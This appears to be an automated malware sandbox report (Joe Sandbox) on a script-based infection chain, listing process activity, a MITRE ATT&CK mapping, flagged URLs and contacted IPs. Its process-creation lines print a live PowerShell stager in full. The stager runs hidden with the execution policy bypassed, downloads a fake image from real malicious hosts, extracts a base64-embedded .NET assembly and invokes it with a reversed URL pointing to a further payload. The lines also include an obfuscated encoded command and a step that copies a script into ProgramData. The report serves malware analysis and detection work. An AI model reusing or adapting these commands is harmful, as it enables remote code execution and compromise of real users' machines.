Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name.vbs	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtrededgtrelwdgtre5dgtredudgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtrededgtrendgtredgtrezdgtredydgtrenwdgtrezdgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtregidgtreawbwdgtrededgtrexwb2dgtregidgtrecwdgtreudgtregodgtrecdgtrebndgtreccdgtrekqdgtre7dgtrecdgtredgtrejdgtrebpdgtreg0dgtreyqbndgtregudgtreqgb5dgtrehqdgtrezqbzdgtrecdgtredgtrepqdgtregdgtreeqdgtrebwb3dg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.cnvh/kj/moc.srednowsredniw//:sptth' , '1' , 'c:\programdata\' , 'name'))} }
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "$codigo = 'zgb1dgtreg4dgtreywb0dgtregkdgtrebwbudgtrecdgtredgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrergbydgtreg8dgtrebqbmdgtregkdgtrebgbrdgtrehmdgtreidgtreb7dgtrecdgtredgtrecdgtrebhdgtrehidgtreyqbtdgtrecdgtredgtrekdgtrebbdgtrehmdgtreddgtrebydgtregkdgtrebgbndgtrefsdgtrexqbddgtrecqdgtrebdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrecdgtredgtrepqdgtregdgtree4dgtrezqb3dgtrec0dgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtrebtdgtrehkdgtrecwb0dgtregudgtrebqdgtreudgtree4dgtrezqb0dgtrec4dgtrevwbldgtregidgtreqwbsdgtregkdgtrezqbudgtrehqdgtreowdgtregdgtrecqdgtrecwbodgtrehudgtrezgbmdgtregwdgtrezqbkdgtreewdgtreaqbudgtregsdgtrecwdgtregdgtred0dgtreidgtrebhdgtregudgtreddgtredgtretdgtrefidgtreyqbudgtregqdgtrebwbtdgtrecdgtredgtrelqbjdgtreg4dgtrecdgtreb1dgtrehqdgtretwbidgtregodgtrezqbjdgtrehqdgtreidgtredgtrekdgtregwdgtreaqbudgtregsdgtrecwdgtregdgtrec0dgtreqwbvdgtrehudgtrebgb0dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtrelgbmdgtregudgtrebgbndgtrehqdgtreadgtredgtre7dgtrecdgtredgtrezgbvdgtrehidgtrezqbhdgtregmdgtreadgtredgtregdgtrecgdgtrejdgtrebsdgtregkdgtrebgbrdgtrecdgtredgtreaqbudgtrecdgtredgtrejdgtrebzdgtreggdgtredqbmdgtregydgtrebdgtrebldgtregqdgtretdgtrebpdgtreg4dgtreawbzdgtreckdgtreidgtreb7dgtrecdgtredgtreddgtrebydgtrehkdgtreidgtreb7dgtrecdgtredgtrecgbldgtrehqdgtredqbydgtreg4dgtreidgtredgtrekdgtrehcdgtrezqbidgtreemdgtrebdgtrebpdgtregudgtrebgb0dgtrec4dgtrerdgtrebvdgtrehcdgtrebgbsdgtreg8dgtreyqbkdgtreeqdgtreyqb0dgtregedgtrekdgtredgtrekdgtregwdgtreaqbudgtregsdgtrekqdgtregdgtreh0dgtreidgtrebjdgtregedgtreddgtrebjdgtreggdgtreidgtreb7dgtrecdgtredgtreywbvdgtreg4dgtreddgtrebpdgtreg4dgtredqbldgtrecdgtredgtrefqdgtregdgtreh0dgtreowdgtregdgtrehidgtrezqb0dgtrehudgtrecgbudgtrecdgtredgtrejdgtrebudgtrehudgtrebdgtrebsdgtrecdgtredgtrefqdgtre7dgtrecdgtredgtrejdgtrebsdgtregkdgtrebgbrdgtrehmdgtreidgtredgtre9dgtrecdgtredgtreqdgtredgtreodgtreccdgtreadgtreb0dgtrehqdgtrecdgtrebzdgtredodgtrelwdgtrevdgtrehudgtrecdgtrebsdgtreg8dgtreyqbkdgtregqdgtrezqbpdgtreg0dgtreyqbndgtregudgtrebgbzdgtrec4dgtreywbvdgtreg0dgtrelgbidgtrehidgtrelwbpdgtreg0dgtreyqbndgtregudgtrecwdgtrevdgtreddgtredgtremdgtredgtre0dgtrec8dgtrenwdgtrezdgtrededgtrelwdgtre5dgtredudgtreodgtredgtrevdgtreg8dgtrecgbpdgtregcdgtreaqbudgtregedgtrebdgtredgtrevdgtreg4dgtrezqb3dgtref8dgtreaqbtdgtregedgtrezwbldgtrec4dgtreagbwdgtregcdgtrepwdgtrexdgtredcdgtremdgtredgtre3dgtrededgtrendgtredgtrezdgtredydgtrenwdgtrezdgtreccdgtreldgtredgtregdgtreccdgtreadgtreb0dgtrehqdgtrecdgtredgtre6dgtrec8dgtrelwdgtre0dgtredudgtrelgdgtre3dgtredqdgtrelgdgtrexdgtredkdgtrelgdgtre4dgtredqdgtrelwb4dgtregedgtrebqbwdgtrehdgtredgtrelwbidgtregsdgtrecdgtredgtrevdgtregidgtreawbwdgtrededgtrexwb2dgtregidgtrecwdgtreudgtregodgtrecdgtrebndgtreccdgtrekqdgtre7dgtrecdgtredgtrejdgtrebpdgtreg0dgtreyqbndgtregudgtreqgb5dgtrehqdgtrezqbzdgtrecdgtredgtrepqdgtregdgtreeqdgtrebwb3dg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('projetoautomacao.vb.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.cnvh/kj/moc.srednowsredniw//:sptth' , '1' , 'c:\programdata\' , 'name'))} }	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	121 Scripting	Valid Accounts	11 Command and Scripting Interpreter	121 Scripting	11 Process Injection	21 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	11 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Software Packing	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://schemas.mi	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://oneget.orgX	0%	URL Reputation	safe
https://oneget.org	0%	URL Reputation	safe
https://www.google.com;	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://winderswonders.com/JK/hvnc.txt	100%	Avira URL Cloud	malware
https://winderswonders.com	100%	Avira URL Cloud	malware
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673	100%	Avira URL Cloud	malware
https://go.microsoft.co	0%	Avira URL Cloud	safe
http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
paste.ee	104.21.84.67	true	false	high
uploaddeimagens.com.br	172.67.215.45	true	true	unknown
winderswonders.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://paste.ee/d/JZHbW	false		high
https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673	true	Avira URL Cloud: malware	unknown
https://paste.ee/d/JZHbW	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg	powershell.exe, 00000004.00000002.2320092493.000001EA52349000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.mi	wscript.exe, 00000008.00000003.2287778815.000001D622B2C000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://go.microsoft.co	powershell.exe, 00000002.00000002.2707547034.000002B3635AB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/JZHbWntsvcs	wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://winderswonders.com/JK/hvnc.txt	powershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com;	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://analytics.paste.ee	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000002.00000002.2672856306.000002B34B56F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paste.ee/d/JZHbWPh	wscript.exe, 00000000.00000003.2078892658.000001680CCCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080287262.000001680CCD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079339248.000001680CCCF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://uploaddeimagens.com.br	powershell.exe, 00000004.00000002.2325661291.000001EA544B3000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/	wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://analytics.paste.ee;	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2672856306.000002B34B5C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2672856306.000002B34B5EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://secure.gravatar.com	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://themes.googleusercontent.com	wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://winderswonders.com	powershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://paste.ee:443/d/JZHbWu	wscript.exe, 00000000.00000002.2080298338.000001680CCDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079117086.000001680CCDB000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.84.67	paste.ee	United States		13335	CLOUDFLARENETUS	false
172.67.215.45	uploaddeimagens.com.br	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1391738
Start date and time:	2024-02-13 21:13:04 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
